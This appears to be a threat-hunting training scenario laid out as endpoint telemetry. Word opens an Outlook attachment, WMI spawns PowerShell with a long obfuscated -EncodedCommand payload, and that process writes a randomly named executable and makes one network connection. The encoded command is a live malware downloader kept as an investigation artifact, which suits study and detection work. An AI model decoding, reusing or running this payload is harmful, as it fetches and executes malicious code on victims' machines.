Scenario #5 | Notion

Peer Process: c:\\program files\\microsoft office\\office16\\winword.exe

Peer MD5: 5f48187825409cbbf797617a991ce4a4

Peer Process CLI:

C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE” /n “C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\KW7Y6LC1\\Untitled-20201014-H470846.doc” /o “

Parent Process: c:\\windows\\system32\\wbem\\wmiprvse.exe

Parent MD5: 801e8003c257c8f540b20f1e0decd3a6

Process: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe

Process MD5: cda48fc75952ad12d99e526d0b6bf70a

Process CLI:

POwersheLL -ENCOD SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBlM1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ==

Process File Write: c:\\users\\UserName\\b20dyak\\ovpqho4\\v9ofyxp.exe

File MD5: 7ee4feeded88cb104448141ef375be8c

File modification count: 1

Network connection count: 1